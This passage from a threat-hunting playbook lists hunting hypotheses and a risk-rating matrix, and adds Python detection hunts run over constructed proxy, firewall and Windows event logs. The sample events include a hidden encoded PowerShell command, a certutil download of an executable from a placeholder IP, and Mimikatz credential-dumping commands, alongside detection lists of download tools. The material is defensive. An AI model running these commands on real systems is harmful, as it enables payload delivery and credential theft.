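The proxy hypotheses (section 1) and the firewall hypotheses (section 2) above each reduce to a filter or a baseline comparison over a handful of log fields. The following is an added example, not code from the original document, that runs those hunts as Python over constructed proxy and firewall lines. The pipe-separated log format, the host, IP and byte values, the ADMIN_JUMP_HOSTS allowlist and the thresholds are assumptions chosen for the illustration, and the beacon check uses a jitter measure (standard deviation over mean of the inter-request gaps) that the page does not specify.

```python
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address
from statistics import mean, pstdev

# Constructed sample proxy lines: time|client|method|host|bytes_out|bytes_in|user_agent
# (10.1.1.9 polling update.example.org every 300 s is the planted beacon candidate).
PROXY_LOG = """\
2024-04-01T09:00:00|10.1.1.5|GET|www.example.com|400|52000|Mozilla/5.0
2024-04-01T09:01:00|10.1.1.5|POST|cdn.example.net|1500000|300|Mozilla/5.0
2024-04-01T09:02:00|10.1.1.7|GET|203.0.113.9|350|12000|Mozilla/5.0
2024-04-01T09:03:00|10.1.1.7|GET|a7f3k9d2m5q8x1z4b6n0p2w9r3t5y7u1.xyz|300|900|curl/8.0
2024-04-01T09:06:00|10.1.1.5|PUT|files.example.com|800|100|Mozilla/5.0
2024-04-01T09:00:00|10.1.1.9|GET|update.example.org|200|200|Mozilla/5.0
2024-04-01T09:05:00|10.1.1.9|GET|update.example.org|200|200|Mozilla/5.0
2024-04-01T09:10:00|10.1.1.9|GET|update.example.org|200|200|Mozilla/5.0
2024-04-01T09:15:00|10.1.1.9|GET|update.example.org|200|200|Mozilla/5.0
"""

def parse_proxy(text):
    """Split the constructed pipe-separated format into typed records."""
    rows = (line.split("|") for line in text.strip().splitlines())
    return [{"ts": datetime.fromisoformat(t), "client": c, "method": m, "host": h,
             "bytes_out": int(o), "bytes_in": int(i), "ua": u} for t, c, m, h, o, i, u in rows]

def is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def hunt_large_uploads(records, threshold=1_000_000):
    """Hypothesis 1.I: one session uploading more than the threshold (default 1 MB)."""
    return [(r["client"], r["host"], r["bytes_out"]) for r in records if r["bytes_out"] > threshold]

def hunt_suspicious_hosts(records, common_tlds=(".com", ".net", ".org"), max_len=30):
    """Hypothesis 1.III: long hosts outside the common TLDs, or an IP literal instead of an FQDN."""
    hits = {(r["client"], r["host"]) for r in records
            if is_ip_literal(r["host"])
            or (not r["host"].endswith(common_tlds) and len(r["host"]) > max_len)}
    return sorted(hits)

def hunt_rare_methods(records, expected=("GET", "POST")):
    """Hypothesis 1.VI: methods other than GET/POST (PUT uploads, CONNECT tunnelling)."""
    return [(r["client"], r["method"], r["host"]) for r in records if r["method"] not in expected]

def hunt_uncommon_user_agents(records, min_clients=2):
    """Hypothesis 1.V: a User-Agent seen from fewer clients than the fleet baseline."""
    clients_per_ua = defaultdict(set)
    for r in records:
        clients_per_ua[r["ua"]].add(r["client"])
    return sorted(ua for ua, clients in clients_per_ua.items() if len(clients) < min_clients)

def hunt_beacons(records, min_requests=4, max_jitter=0.2):
    """Hypothesis 1.VII: client->host pairs whose request gaps are nearly constant (jitter = stdev/mean)."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["client"], r["host"])].append(r["ts"])
    hits = []
    for (client, host), times in by_pair.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            hits.append((client, host, round(mean(gaps))))
    return hits

# Constructed firewall flow lines: client|server|port|app (app = protocol the firewall identified).
FW_LOG = """\
10.1.1.5|10.1.2.10|3389|rdp
10.1.1.50|10.1.2.10|3389|rdp
10.1.1.7|10.1.2.20|22|ssh
10.1.1.7|198.51.100.4|80|ssl
10.1.1.9|198.51.100.4|80|http
"""
ADMIN_JUMP_HOSTS = {"10.1.1.50"}  # assumed: the only hosts expected to open RDP/SSH sessions
EXPECTED_APP = {80: "http", 443: "ssl", 22: "ssh", 3389: "rdp"}

def parse_firewall(text):
    rows = (line.split("|") for line in text.strip().splitlines())
    return [{"client": c, "server": s, "port": int(p), "app": a} for c, s, p, a in rows]

def hunt_unexpected_remote_sessions(flows, allowed=ADMIN_JUMP_HOSTS, ports=(22, 3389)):
    """Hypotheses 2.I and 2.II: SSH or RDP from a client that is not a known admin host."""
    return sorted({(f["client"], f["server"], f["port"]) for f in flows
                   if f["port"] in ports and f["client"] not in allowed})

def hunt_port_app_mismatch(flows):
    """Hypothesis 2.VI: the application seen on a port is not the one expected there."""
    return [(f["client"], f["server"], f["port"], f["app"]) for f in flows
            if f["port"] in EXPECTED_APP and f["app"] != EXPECTED_APP[f["port"]]]

if __name__ == "__main__":
    proxy, fw = parse_proxy(PROXY_LOG), parse_firewall(FW_LOG)
    for hunt in (hunt_large_uploads, hunt_suspicious_hosts, hunt_rare_methods, hunt_uncommon_user_agents, hunt_beacons):
        print(hunt.__name__, hunt(proxy))
    for hunt in (hunt_unexpected_remote_sessions, hunt_port_app_mismatch):
        print(hunt.__name__, hunt(fw))
```

The thresholds (1 MB, 30 characters, two clients, 20 % jitter) are starting points to tune against the environment's own baseline, and the beacon hunt will also surface benign pollers such as update checks, which is why these are hypotheses to triage rather than alerts.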
5. Other Hunting Hypotheses

• Hunt for file-less malware
• Hunt for malware
• Hunt for lateral movement
• Hunt for Windows event IDs
• Hunt for group policy violations
• Hunt for network beaconing
• Hunt for insider privilege escalation
• Hunt for privilege failures
• Hunt for PowerShell errors
• Hunt for PowerShell traces
• Hunt for login failures on critical servers
• Hunt for vulnerabilities
• Hunt for persistence
• Hunt for registry violations
• Hunt for network traffic denied by firewalls or IPS
• Hunt for unusual DNS requests, either to malicious domains or exposing internal flaws
• Hunt for signs of DDoS activity and geographic irregularities
• Hunt for mismatched port/application traffic
• Hunt for unusual north-south or east-west network traffic
• Hunt for anomalies
• Hunt for unknown network shares
• Hunt for network reconnaissance tools
• Hunt for brute-force RDP attempts
• Hunt for suspicious file types
• Hunt for Windows admin shares
• Hunt for RDP, PsExec, task created, task scheduled, WMI, services created
• Hunt for parent/child relationships - process
• Hunt for parent/child relationships - MS Office
• Hunt for parent/child relationships - cmd
• Hunt for parent/child relationships - PowerShell
• Hunt for parent/child relationships - memory
• Hunt for process injection
• Hunt for Windows one-liners used to download remote payloads. Possible tools: powershell.exe, wmic.exe, regsvr32.exe, rundll32.exe, mshta.exe, regasm.exe, regsvcs.exe, odbcconf.exe, msbuild.exe, certutil.exe, bitsadmin.exe
• Hunt for masquerading
• Hunt for privilege escalation - access token manipulation
• Hunt for privilege escalation - weak service permissions
• Hunt for UAC bypass
• Hunt for credential dumping
• Hunt for credential dumping - dumped SAM/SECURITY registry hives
• Hunt for credential dumping - shadow copies
• Hunt for Mimikatz commands / hunting DCShadow
• Hunt for credential dumping - LSASS memory access
• Hunt for suspicious services: services that run executables from %systemroot%
• Hunt for suspicious services: services that run PowerShell
• Hunt for beaconing
• Hunt for bot activity
• Hunt for malicious domains and DNS tunnelling

7. Risk Rating Measurement Matrix

This rating is applied to threats that will have an impact on the organization.

HIGH. A threat is categorized as HIGH if it:
• involves critical organization assets
• attempts to evade standard signature-based detection
• exfiltrates data outside the organization
• attempts to create a communication link with an external command and control server
• results in direct reputational or financial loss for the organization

MEDIUM. A threat is categorized as MEDIUM if it:
• involves limited infections at endpoints
• involves malware on a system that cannot be cleaned, deleted or quarantined
• attempts to connect externally but is blocked
• involves access to suspicious domains or IP addresses

LOW. A threat is categorized as LOW if it:
• involves attempted attacks from external sources
• relates to security misconfiguration in systems
• involves access to non-standard or non-business domains or IP addresses
• involves installation of unnecessary applications (not necessarily malicious)

Prepared by: Vishal Kumar, Threat Analyst
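The Windows hypotheses in section 4 and the process-oriented items in section 5 (parent/child relationships for MS Office and cmd, one-liner download tools, masquerading, credential dumping with Mimikatz, users added to privileged groups) all reduce to matching on a few fields of event 4688 or of the group-membership events. The following is an added example, not part of the original document: constructed 4688 and 4732 records in dictionary form and the hunts run over them. The record field names, the sample accounts, paths and command lines, and the group and image lists are assumptions made for this illustration; it also assumes that "Include command line in process creation events" is enabled, since without it 4688 carries no CommandLine field to match on.

```python
import re
from ntpath import basename  # splits Windows paths correctly on any host OS

# Constructed sample Security-log records (4688 process creation, 4732 member added to a local
# group) in the field shape the hypotheses above name. All accounts, paths and command lines
# are made up for the example; the last 4688 event is a renamed Mimikatz copy.
EVENTS = [
    {"EventID": 4688, "Account": "alice", "NewProcessName": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "WINWORD.EXE /n invoice.docx"},
    {"EventID": 4688, "Account": "alice", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": "cmd.exe /c powershell -w hidden -enc SQBFAFgA"},
    {"EventID": 4688, "Account": "alice", "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.9/p.exe p.exe"},
    {"EventID": 4688, "Account": "alice", "NewProcessName": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "svchost.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"EventID": 4732, "Account": "alice", "MemberName": "CORP\\alice", "TargetGroup": "Administrators"},
    {"EventID": 4732, "Account": "svc_backup", "MemberName": "CORP\\bob", "TargetGroup": "Backup Operators"},
    {"EventID": 4688, "Account": "bob", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# The one-liner download tools listed under section 5
LOLBINS = {"powershell.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "regasm.exe",
           "regsvcs.exe", "odbcconf.exe", "msbuild.exe", "certutil.exe", "bitsadmin.exe"}
SYSTEM_IMAGES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}
SYSTEM_DIR = "c:\\windows\\system32\\"
PRIV_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins", "Backup Operators"}
GROUP_ADD_IDS = {4728, 4732, 4756, 4746, 4751, 4761}  # member added to a local/global/universal group
MIMIKATZ_CMDS = re.compile(r"sekurlsa::|lsadump::|privilege::debug|kerberos::golden", re.I)
URL_RE = re.compile(r"https?://", re.I)


def image(ev):
    return basename(ev["NewProcessName"]).lower()


def parent(ev):
    return basename(ev["ParentProcessName"]).lower()


def process_events(events):
    return [ev for ev in events if ev["EventID"] == 4688]


def hunt_office_spawning_shell(events):
    """Parent/child relationship hunt: an Office application launching a shell or script host."""
    return [(ev["Account"], parent(ev), image(ev)) for ev in process_events(events)
            if parent(ev) in OFFICE_PARENTS and image(ev) in SHELLS]


def hunt_lolbin_download(events):
    """One-liner remote payload download: a listed tool with a URL on its command line."""
    return [(ev["Account"], image(ev), ev["CommandLine"]) for ev in process_events(events)
            if image(ev) in LOLBINS and URL_RE.search(ev["CommandLine"])]


def hunt_masquerading(events):
    """Masquerading: a core Windows image name running from outside System32."""
    return [(ev["Account"], ev["NewProcessName"]) for ev in process_events(events)
            if image(ev) in SYSTEM_IMAGES and not ev["NewProcessName"].lower().startswith(SYSTEM_DIR)]


def hunt_mimikatz(events):
    """Credential dumping: match the image name OR the module::command syntax, so the
    renamed copy in Temp is still caught (hypothesis 4.III matches the image name only)."""
    return [(ev["Account"], ev["NewProcessName"]) for ev in process_events(events)
            if image(ev) == "mimikatz.exe" or MIMIKATZ_CMDS.search(ev["CommandLine"])]


def hunt_privileged_group_additions(events):
    """Hypothesis 4.II: a member added to a privileged group, whichever account did it."""
    return [(ev["Account"], ev["MemberName"], ev["TargetGroup"]) for ev in events
            if ev["EventID"] in GROUP_ADD_IDS and ev["TargetGroup"] in PRIV_GROUPS]


if __name__ == "__main__":
    for hunt in (hunt_office_spawning_shell, hunt_lolbin_download, hunt_masquerading,
                 hunt_mimikatz, hunt_privileged_group_additions):
        print(hunt.__name__, hunt(EVENTS))
```

The sample deliberately contains a Mimikatz copy renamed to svchost.exe and run from a user's Temp directory: the image-name check of hypothesis 4.III misses it, while the command-syntax check and the masquerading hunt both surface it, which is the point of pairing a behavioural test with each atomic one.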